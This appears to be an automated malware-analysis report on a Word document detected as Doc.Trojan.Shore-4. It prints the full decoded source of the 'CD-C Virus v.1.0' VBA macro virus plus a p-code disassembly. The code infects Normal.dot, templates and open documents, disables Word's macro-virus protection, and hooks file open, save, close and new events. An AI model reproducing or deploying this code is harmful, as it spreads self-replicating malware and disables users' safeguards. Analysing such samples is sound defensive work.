MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy WordBasic macro-virus and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code. ClamAV detection as 'Doc.Trojan.Shore-4' further confirms its malicious nature. The VBA script itself is heavily obfuscated and contains numerous string concatenations and constants that likely form malicious commands or URLs, but these are not fully reconstructible from the provided excerpt.
Heuristics 6
-
ClamAV: Doc.Trojan.Shore-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Shore-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines 1, .CountOfLines -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36686 bytes |
SHA-256: 9871688ffbf6ec113e47d244a765740fd21c44b103b1186487aff60be46169c9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Shore-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CDC_v10"
'***** CD-C Virus v.1.0 *****
'Tembalang, Saturday, November 18, 2000
Public Const SeriesNumber = 200002
Public Const ModuleName = "CDC_v10", FormName = "CDC_Form", _
mw = "Microsoft Word", _
SerNum$ = "Series Number", _
pass = "Password : ", _
Destroying = "Normal." & ModuleName & ".Destroyer", _
Checking = "Normal." & ModuleName & ".CheckNormal"
Public Const CDE = "CD-C Electrical Engineering", _
hcID = "Ahmad", mail = "e-mail: mas.cdc@usa.net", _
ACDE = "About CD-C"
Public Const HAText1 = "Dengerin nasehat symbah AM. " & _
"Bermain air basah, bermain api gosong, " & _
"Bermain virus asyiiik dech...", _
cipta = "CD-C EE v.10 (C) " & hcID, _
ttgl = "Tembalang, Nov, 2000"
Public Const msg = "Guoooblok!!! Kuncine keliru :))", _
aaa = "fLQ-À°vtµÆ__", bbb = "iq5diani", ccc = "ssss", _
msgcap = "Pekok...!!!", _
code = "gathel", ddd = "Kluruk", eee = "Telp117", _
xxx = "cdee99"
Public anCap As String, anInt As Single, anPos As Integer, Animated As Boolean, _
ToolsOptionsDlg As Dialog, _
OrganizerDlg As Dialog, _
ToolsTemplatesDlg As Dialog, _
ToolsMacrosDlg As Dialog, _
FormatStyleDlg As Dialog
'Procedures in CDC module
Sub Buggy()
Dim aDocProp As DocumentProperty
For Each aDocProp In NormalTemplate.CustomDocumentProperties
aDocProp.Delete
Next aDocProp
NormalTemplate.CustomDocumentProperties.Add _
Name:=SerNum$, _
Type:=msoPropertyTypeNumber, _
Value:=SeriesNumber, _
LinkToContent:=False
End Sub
Function getDocPropExist(theObject As Object) As Boolean
Dim adp As DocumentProperty
getDocPropExist = False
For Each adp In theObject.CustomDocumentProperties
With adp
If .Name = SerNum$ And .Type = msoPropertyTypeNumber And _
.Value >= SeriesNumber Then
getDocPropExist = True
Exit Function
End If
End With
Next adp
End Function
Function getModuleExist(theObject As Object) As Boolean
Dim aDocProp As DocumentProperty
getModuleExist = False
For Each anObject In theObject.VBProject.VBComponents
If anObject.Name = ModuleName Then
getModuleExist = True
Exit Function
End If
Next anObject
End Function
Function getInfected(theObject As Object) As Boolean
getInfected = getModuleExist(theObject) And getDocPropExist(theObject)
End Function
Sub clearMacros(theObject As Object)
Dim aDocProp As DocumentProperty
For Each anObject In theObject.VBProject.VBComponents
If anObject.Name <> "ThisDocument" Then
Application.OrganizerDelete Source:=theObject.FullName, _
Name:=anObject.Name, Object:=wdOrganizerObjectProjectItems
Else
On Error Resume Next
With anObject.CodeModule
.DeleteLines 1, .CountOfLines
End With
End If
Next anObject
For Each aDocProp In theObject.CustomDocumentProperties
aDocProp.Delete
Next aDocProp
End Sub
Sub copyMacros(theSource As Object, theDestination As Object)
Dim aDocProp As DocumentProperty
If Not getDocPropExist(theDestination) Then _
theDestination.CustomDocumentProperties.Add _
Name:=SerNum$, _
Type:=msoPropertyTypeNumber, _
Value:=SeriesNumber, _
LinkToContent:=False
On Error Resume Next
Application.OrganizerCopy _
Source:=theSource.FullName, _
Destination:=theDestination.FullName, _
Name:=ModuleName, _
Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy _
Source:=theSource.FullName, _
Destination:=theDestination.FullName, _
Name:=FormName, _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub Infecting(theSource As Object, theDestination As Object)
On Error Resume Next
If Not getInfected(theDestination) Then
Application.OrganizerRename _
Source:=theDestination.FullName, _
Name:=ModuleName, newname:="xxxx", _
Object:=wdOrganizerObjectProjectItems
clearMacros theDestination
copyMacros theSource, theDestination
On Error Resume Next
theDestination.Save True
End If
End Sub
Sub Copy2Normal()
Dim ATemp As Template
Stealth
If Documents.Count > 0 Then
Infecting ActiveDocument, NormalTemplate
If ActiveDocument.AttachedTemplate <> NormalTemplate Then _
Infecting ActiveDocument, ActiveDocument.AttachedTemplate
For Each ATemp In Templates
Infecting ActiveDocument, ATemp
Next ATemp
End If
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
End With
End Sub
Sub Copy2Document()
Dim Adoc As Document
Stealth
For Each Adoc In Documents
Infecting NormalTemplate, Adoc
On Error Resume Next
WordBasic.viewpage
Next Adoc
If Documents.Count > 0 Then _
If ActiveDocument.AttachedTemplate <> NormalTemplate Then _
Infecting NormalTemplate, ActiveDocument.AttachedTemplate
End Sub
Sub Jump2Normal(macName As String)
Application.Run "normal." & ModuleName & "." & macName
End Sub
'infection procedures
Sub AutoOpen()
Stealth
WordBasic.DisableAutoMacros True
If getModuleExist(NormalTemplate) Then
Jump2Normal ("Copy2Document")
If Documents.Count > 0 Then
On Error Resume Next
ActiveDocument.Save
End If
Else
Copy2Normal
On Error Resume Next
NormalTemplate.Save
End If
End Sub
Sub FileOpen()
Stealth
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
AutoOpen
On Error Resume Next
ActiveDocument.Saved = True
ActiveDocument.Save
End If
WordBasic.DisableAutoMacros False
End Sub
Sub AutoClose()
Stealth
On Error Resume Next
' AutoOpen
Copy2Document
If Not ActiveDocument.Saved And ActiveDocument.Characters.Count > 0 Then ActiveDocument.Save
ActiveDocument.Saved = True
ModifyAttr ActiveDocument.FullName
End Sub
Sub FileClose()
Dim afn As String
WordBasic.DisableAutoMacros True
On Error Resume Next
AutoClose
afn = ActiveDocument.FullName
ActiveDocument.Close
ModifyAttr afn
WordBasic.DisableAutoMacros False
End Sub
Sub FileSave()
WordBasic.DisableAutoMacros True
Copy2Document
On Error Resume Next
With ActiveDocument
.Save
.Saved = True
End With
WordBasic.DisableAutoMacros False
End Sub
Sub InitDialog()
Stealth
Application.DisplayAlerts = wdAlertsNone
On Error Resume Next
Set ToolsOptionsDlg = Dialogs(wdDialogToolsOptions)
Set OrganizerDlg = Dialogs(wdDialogOrganizer)
Set ToolsTemplatesDlg = Dialogs(wdDialogToolsTemplates)
Set ToolsMacrosDlg = Dialogs(wdDialogToolsMacro)
Set FormatStyleDlg = Dialogs(wdDialogFormatStyle)
End Sub
Sub AutoExec()
WordBasic.DisableAutoMacros True
InitDialog
Application.OnTime Now + TimeSerial(0, 0, 9), Destroying
End Sub
Sub Destroyer()
Copy2Normal
If getInfected(NormalTemplate) Then Copy2Document
ModifyAttr NormalTemplate.FullName
Buggy
CheckNormal
End Sub
Sub CheckNormal()
If Not getInfected(NormalTemplate) Then _
Copy2Normal
Application.OnTime Now + TimeSerial(0, 1, 0), Checking
End Sub
Sub AutoExit()
AutoOpen
ModifyAttr NormalTemplate.FullName
PesanClose
End Sub
Sub fileNewDefault()
WordBasic.fileNewDefault
Copy2Document
End Sub
Sub FileNew()
If Dialogs(wdDialogFileNew).Show <> 0 Then
Copy2Document
End If
End Sub
Sub Stealth()
With Options
.SaveNormalPrompt = False
.SavePropertiesPrompt = False
.VirusProtection = False
End With
Application.ShowVisualBasicEditor = False
End Sub
Sub NoStealth()
With Options
.SaveNormalPrompt = True
.SavePropertiesPrompt = True
.VirusProtection = True
End With
End Sub
Sub ToolsOptions()
InitDialog
NoStealth
On Error Resume Next
ToolsOptionsDlg.Display
Stealth
End Sub
Sub NoAccess()
a = MsgBox(msg, vbExclamation, msgcap)
'**** AnimateCaption
End Sub
Function passDialog() As Boolean
Dim cruel As String
passDialog = False
cdee = "CD-C " + EE
sandi = xxx + Mid(code, 5, 2)
If LCase(InputBox(pass, cdee)) = sandi Then
passDialog = True
Else
NoAccess
End If
End Function
Sub ToolsMacro()
'InitDialog
'ToolsMacrosDlg.Display
'**** AnimateCaption
End Sub
Sub FileTemplates()
InitDialog
ToolsTemplatesDlg.Display
' CustomizationContext = NormalTemplate
'**** AnimateCaption
End Sub
Sub ViewVbCode()
'Application.ShowVisualBasicEditor = passDialog
End Sub
Sub viewcode()
'viewvbcode
End Sub
Sub Organizer()
InitDialog
OrganizerDlg.Display
'**** AnimateCaption
End Sub
Sub FormatStyle()
InitDialog
With FormatStyleDlg
.Display
.Execute
End With
End Sub
Sub ModifyAttr(fileName As String)
On Error Resume Next
If GetAttr(fileName) <> vbArchive Then SetAttr fileName, vbArchive
End Sub
Sub Ngeceng()
For i = 0 To 100
Beep
Next i
With CDC_Form
.Width = 220
.Height = 170
With .Judul
.Left = 15
.Top = 5
.Width = 180
.Height = 20
.Caption = CDE
.Font.Bold = True
End With
With .OKButton
.Width = 50
.Height = 25
.Left = 85
.Top = 120
End With
With .Komentar
.Width = 200
.Height = 90
.Top = 30
.Left = 5
End With
.Show
End With
End Sub
Sub HelpAbout()
With CDC_Form
.Caption = "About CD-C"
.Komentar.Text = HAText1 & Chr(13) & Chr(13) & _
cipta & Chr(13) & ttgl & Chr(13) & _
mail
End With
Ngeceng
End Sub
Sub PesanClose()
H = Time
If (WeekDay(Date) = vbFriday Or WeekDay(Date) = vbSaturday) And _
Date > #12/15/00# And _
(Time > #5:00:00 PM# And Time < #9:00:00 PM#) Then
For i = 1 To 100
Beep
Next i
CDC_Form.Caption = "Selamat Tinggal"
With CDC_Form.Komentar
.Text = "CD-C Antivirus v.10" & Chr(13) & _
"Terimakasih atas pengguanan software ini" & Chr(13) & _
"dan semoga komputer anda terhindar dari" & Chr(13) & _
"virus komputer yang merusak. Amiin." & Chr(13) & _
Chr(13) & cipta & ", Nov 2000" & Chr(13) & _
mail
End With
Ngeceng
End If
End Sub
' Processing file: /tmp/qstore_i5olmsdj
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1122 bytes
' Macros/VBA/CDC_v10 - 19241 bytes
' Line #0:
' QuoteRem 0x0000 0x001C "***** CD-C Virus v.1.0 *****"
' Line #1:
' QuoteRem 0x0000 0x0026 "Tembalang, Saturday, November 18, 2000"
' Line #2:
' Line #3:
' Dim (Public Const)
' LitDI4 0x0D42 0x0003
' VarDefn SeriesNumber
' Line #4:
' LineCont 0x0014 0A 00 08 00 0E 00 08 00 12 00 08 00 16 00 08 00 1E 00 08 00
' Dim (Public Const)
' LitStr 0x0007 "CDC_v10"
' VarDefn ModuleName
' LitStr 0x0008 "CDC_Form"
' VarDefn FormName
' LitStr 0x000E "Microsoft Word"
' VarDefn mw
' LitStr 0x000D "Series Number"
' VarDefn SerNum
' LitStr 0x000B "Password : "
' VarDefn pass
' LitStr 0x0007 "Normal."
' Ld ModuleName
' Concat
' LitStr 0x000A ".Destroyer"
' Concat
' VarDefn Destroying
' LitStr 0x0007 "Normal."
' Ld ModuleName
' Concat
' LitStr 0x000C ".CheckNormal"
' Concat
' VarDefn Checking
' Line #5:
' Line #6:
' LineCont 0x0008 06 00 08 00 0E 00 08 00
' Dim (Public Const)
' LitStr 0x001B "CD-C Electrical Engineering"
' VarDefn CDE
' LitStr 0x0005 "Ahmad"
' VarDefn hcID
' LitStr 0x0017 "e-mail: mas.cdc@usa.net"
' VarDefn mail
' LitStr 0x000A "About CD-C"
' VarDefn ACDE
' Line #7:
' Line #8:
' LineCont 0x0010 06 00 0D 00 08 00 0D 00 0A 00 08 00 10 00 08 00
' Dim (Public Const)
' LitStr 0x001C "Dengerin nasehat symbah AM. "
' LitStr 0x0027 "Bermain air basah, bermain api gosong, "
' Concat
' LitStr 0x001D "Bermain virus asyiiik dech..."
' Concat
' VarDefn HAText1
' LitStr 0x0011 "CD-C EE v.10 (C) "
' Ld hcID
' Concat
' VarDefn cipta
' LitStr 0x0014 "Tembalang, Nov, 2000"
' VarDefn ttgl
' Line #9:
' Line #10:
' LineCont 0x0010 06 00 08 00 12 00 08 00 16 00 08 00 22 00 08 00
' Dim (Public Const)
' LitStr 0x001F "Guoooblok!!! Kuncine keliru :))"
' VarDefn msg
' LitStr 0x000C "fLQ-À°vtµÆ__"
' VarDefn aaa
' LitStr 0x0008 "iq5diani"
' VarDefn bbb
' LitStr 0x0004 "ssss"
' VarDefn ccc
' LitStr 0x000B "Pekok...!!!"
' VarDefn msgcap
' LitStr 0x0006 "gathel"
' VarDefn code
' LitStr 0x0006 "Kluruk"
' VarDefn ddd
' LitStr 0x0007 "Telp117"
' VarDefn eee
' LitStr 0x0006 "cdee99"
' VarDefn xxx
' Line #11:
' LineCont 0x0014 11 00 08 00 15 00 08 00 19 00 08 00 1D 00 08 00 21 00 08 00
' Dim (Public)
' VarDefn anCap (As String)
' VarDefn anInt (As Single)
' VarDefn anPos (As Integer)
' VarDefn Animated (As Boolean)
' VarDefn ToolsOptionsDlg
' VarDefn OrganizerDlg
' VarDefn ToolsTemplatesDlg
' VarDefn ToolsMacrosDlg
' VarDefn FormatStyleDlg
' Line #12:
' Line #13:
' QuoteRem 0x0000 0x0018 "Procedures in CDC module"
' Line #14:
' FuncDefn (Sub Buggy())
' Line #15:
' Dim
' VarDefn aDocProp (As DocumentProperty)
' Line #16:
' StartForVariable
' Ld aDocProp
' EndForVariable
' Ld NormalTemplate
' MemLd CustomDocumentProperties
' ForEach
' Line #17:
' Ld aDocProp
' ArgsMemCall Delete 0x0000
' Line #18:
' StartForVariable
' Ld aDocProp
' EndForVariable
' NextVar
' Line #19:
' Line #20:
' LineCont 0x0010 05 00 0C 00 09 00 0C 00 0D 00 0C 00 11 00 0C 00
' Ld SerNum$
' ParamNamed New
' Ld msoPropertyTypeNumber
' ParamNamed TypeOf
' Ld SeriesNumber
' ParamNamed Value
' LitVarSpecial (False)
' ParamNamed LinkToContent
' Ld NormalTemplate
' MemLd CustomDocumentProperties
' ArgsMemCall Add 0x0004
' Line #21:
' EndSub
' Line #22:
' FuncDefn (Function getDocPropExist(theObject As Object) As Boolean)
' Line #23:
' Dim
' VarDefn adp (As DocumentProperty)
' Line #24:
' LitVarSpecial (False)
' St getDocPropExist
' Line #25:
' StartForVariable
' Ld adp
' EndForVariable
' Ld theObject
' MemLd CustomDocumentProperties
' ForEach
' Line #26:
' StartWithExpr
' Ld adp
' With
' Line #27:
' LineCont 0x0004 0B 00 0C 00
' MemLdWith New
' Ld SerNum$
' Eq
' MemLdWith TypeOf
' Ld msoPropertyTypeNumber
' Eq
' And
' MemLdWith Value
' Ld SeriesNumber
' Ge
' And
' IfBlock
' Line #28:
' LitVarSpecial (True)
' St getDocPropExist
' Line #29:
' ExitFunc
' Line #30:
' EndIfBlock
' Line #31:
' EndWith
' Line #32:
' StartForVariable
' Ld adp
' EndForVariable
' NextVar
' Line #33:
' EndFunc
' Line #34:
' FuncDefn (Function getModuleExist(theObject As Object) As Boolean)
' Line #35:
' Dim
' VarDefn aDocProp (As DocumentProperty)
' Line #36:
' LitVarSpecial (False)
' St getModuleExist
' Line #37:
' StartForVariable
' Ld anObject
' EndForVariable
' Ld theObject
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #38:
' Ld anObject
' MemLd New
' Ld ModuleName
' Eq
' IfBlock
' Line #39:
' LitVarSpecial (True)
' St getModuleExist
' Line #40:
' ExitFunc
' Line #41:
' EndIfBlock
' Line #42:
' StartForVariable
' Ld anObject
' EndForVariable
' NextVar
' Line #43:
' EndFunc
' Line #44:
' FuncDefn (Function getInfected(theObject As Object) As Boolean)
' Line #45:
' Ld theObject
' ArgsLd getModuleExist 0x0001
' Ld theObject
' ArgsLd getDocPropExist 0x0001
' And
' St getInfected
' Line #46:
' EndFunc
' Line #47:
' FuncDefn (Sub clearMacros(theObject As Object))
' Line #48:
' Dim
' VarDefn aDocProp (As DocumentProperty)
' Line #49:
' StartForVariable
' Ld anObject
' EndForVariable
' Ld theObject
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #50:
' Ld anObject
' MemLd New
' LitStr 0x000C "ThisDocument"
' Ne
' IfBlock
' Line #51:
' LineCont 0x0004 09 00 0C 00
' Ld theObject
' MemLd FullName
' ParamNamed Source
' Ld anObject
' MemLd New
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerDelete 0x0003
' Line #52:
' ElseBlock
' Line #53:
' OnError (Resume Next)
' Line #54:
' StartWithExpr
' Ld anObject
' MemLd CodeModule
' With
' Line #55:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #56:
' EndWith
' Line #57:
' EndIfBlock
' Line #58:
' StartForVariable
' Ld anObject
' EndForVariable
' NextVar
' Line #59:
' Line #60:
' StartForVariable
' Ld aDocProp
' EndForVariable
' Ld theObject
' MemLd CustomDocumentProperties
' ForEach
' Line #61:
' Ld aDocProp
' ArgsMemCall Delete 0x0000
' Line #62:
' StartForVariable
' Ld aDocProp
' EndForVariable
' NextVar
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub copyMacros(theSource As Object, theDestination As Object))
' Line #65:
' Dim
' VarDefn aDocProp (As DocumentProperty)
' Line #66:
' LineCont 0x0014 07 00 08 00 0C 00 0C 00 10 00 0C 00 14 00 0C 00 18 00 0C 00
' Ld theDestination
' ArgsLd getDocPropExist 0x0001
' Not
' If
' BoSImplicit
' Ld SerNum$
' ParamNamed New
' Ld msoPropertyTypeNumber
' ParamNamed TypeOf
' Ld SeriesNumber
' ParamNamed Value
' LitVarSpecial (False)
' ParamNamed LinkToContent
' Ld theDestination
' MemLd CustomDocumentProperties
' ArgsMemCall Add 0x0004
' EndIf
' Line #67:
' Line #68:
' OnError (Resume Next)
' Line #69:
' LineCont 0x0010 03 00 0C 00 09 00 0C 00 0F 00 0C 00 13 00 0C 00
' Ld theSource
' MemLd FullName
' ParamNamed Source
' Ld theDestination
' MemLd FullName
' ParamNamed Destination
' Ld ModuleName
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #70:
' LineCont 0x0010 03 00 0C 00 09 00 0C 00 0F 00 0C 00 13 00 0C 00
' Ld theSource
' MemLd FullName
' ParamNamed Source
' Ld theDestination
' MemLd FullName
' ParamNamed Destination
' Ld FormName
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #71:
' EndSub
' Line #72:
' FuncDefn (Sub Infecting(theSource As Object, theDestination As Object))
' Line #73:
' OnError (Resume Next)
' Line #74:
' Ld theDestination
' ArgsLd getInfected 0x0001
' Not
' IfBlock
' Line #75:
' LineCont 0x000C 03 00 0C 00 09 00 0C 00 11 00 0C 00
' Ld theDestination
' MemLd FullName
' ParamNamed Source
' Ld ModuleName
' ParamNamed New
' LitStr 0x0004 "xxxx"
' ParamNamed newname
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerRename 0x0004
' Line #76:
' Ld theDestination
' ArgsCall clearMacros 0x0001
' Line #77:
' Ld theSource
' Ld theDestination
' ArgsCall copyMacros 0x0002
' Line #78:
' OnError (Resume Next)
' Line #79:
' LitVarSpecial (True)
' Ld theDestination
' ArgsMemCall Save 0x0001
' Line #80:
' EndIfBlock
' Line #81:
' EndSub
' Line #82:
' FuncDefn (Sub Copy2Normal())
' Line #83:
' Dim
' VarDefn ATemp (As Template)
' Line #84:
' ArgsCall Stealth 0x0000
' Line #85:
' Ld Documents
' MemLd Count
' LitDI2 0x0000
' Gt
' IfBlock
' Line #86:
' Ld ActiveDocument
' Ld NormalTemplate
' ArgsCall Infecting 0x0002
' Line #87:
' LineCont 0x0004 07 00 0C 00
' Ld ActiveDocument
' MemLd AttachedTemplate
' Ld NormalTemplate
' Ne
' If
' BoSImplicit
' Ld ActiveDocument
' Ld ActiveDocument
' MemLd AttachedTemplate
' ArgsCall Infecting 0x0002
' EndIf
' Line #88:
' StartForVariable
' Ld ATemp
' EndForVariable
' Ld Templates
' ForEach
' Line #89:
' Ld ActiveDocument
' Ld ATemp
' ArgsCall Infecting 0x0002
' Line #90:
' StartForVariable
' Ld ATemp
' EndForVariable
' NextVar
' Line #91:
' EndIfBlock
' Line #92:
' Line #93:
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #94:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #95:
' EndWith
' Line #96:
' EndSub
' Line #97:
' Line #98:
' FuncDefn (Sub Copy2Document())
' Line #99:
' Dim
' VarDefn Adoc (As Document)
' Line #100:
' ArgsCall Stealth 0x0000
' Line #101:
' StartForVariable
' Ld Adoc
' EndForVariable
' Ld Documents
' ForEach
' Line #102:
' Ld NormalTemplate
' Ld Adoc
' ArgsCall Infecting 0x0002
' Line #103:
' OnError (Resume Next)
' Line #104:
' Ld WordBasic
' ArgsMemCall viewpage 0x0000
' Line #105:
' StartForVariable
' Ld Adoc
' EndForVariable
' NextVar
' Line #106:
' LineCont 0x0008 07 00 04 00 0E 00 08 00
' Ld Documents
' MemLd Count
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' Ld ActiveDocument
' MemLd AttachedTemplate
' Ld NormalTemplate
' Ne
' If
' BoSImplicit
' Ld NormalTemplate
' Ld ActiveDocument
' MemLd AttachedTemplate
' ArgsCall Infecting 0x0002
' EndIf
' EndIf
' Line #107:
' EndSub
' Line #108:
' Line #109:
' FuncDefn (Sub Jump2Normal(macName As String))
' Line #110:
' LitStr 0x0007 "normal."
' Ld ModuleName
' Concat
' LitStr 0x0001 "."
' Concat
' Ld macName
' Concat
' Ld Application
' ArgsMemCall Run 0x0001
' Line #111:
' EndSub
' Line #112:
' QuoteRem 0x0000 0x0014 "infection procedures"
' Line #113:
' FuncDefn (Sub AutoOpen())
' Line #114:
' ArgsCall Stealth 0x0000
' Line #115:
' LitVarSpecial (True)
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #116:
' Line #117:
' Ld NormalTemplate
' ArgsLd getModuleExist 0x0001
' IfBlock
' Line #118:
' LitStr 0x000D "Copy2Document"
' Paren
' ArgsCall Jump2Normal 0x0001
' Line #119:
' Ld Documents
' MemLd Count
' LitDI2 0x0000
' Gt
' IfBlock
' Line #120:
' OnError (Resume Next)
' Line #121:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #122:
' EndIfBlock
' Line #123:
' ElseBlock
' Line #124:
' ArgsCall Copy2Normal 0x0000
' Line #125:
' OnError (Resume Next)
' Line #126:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.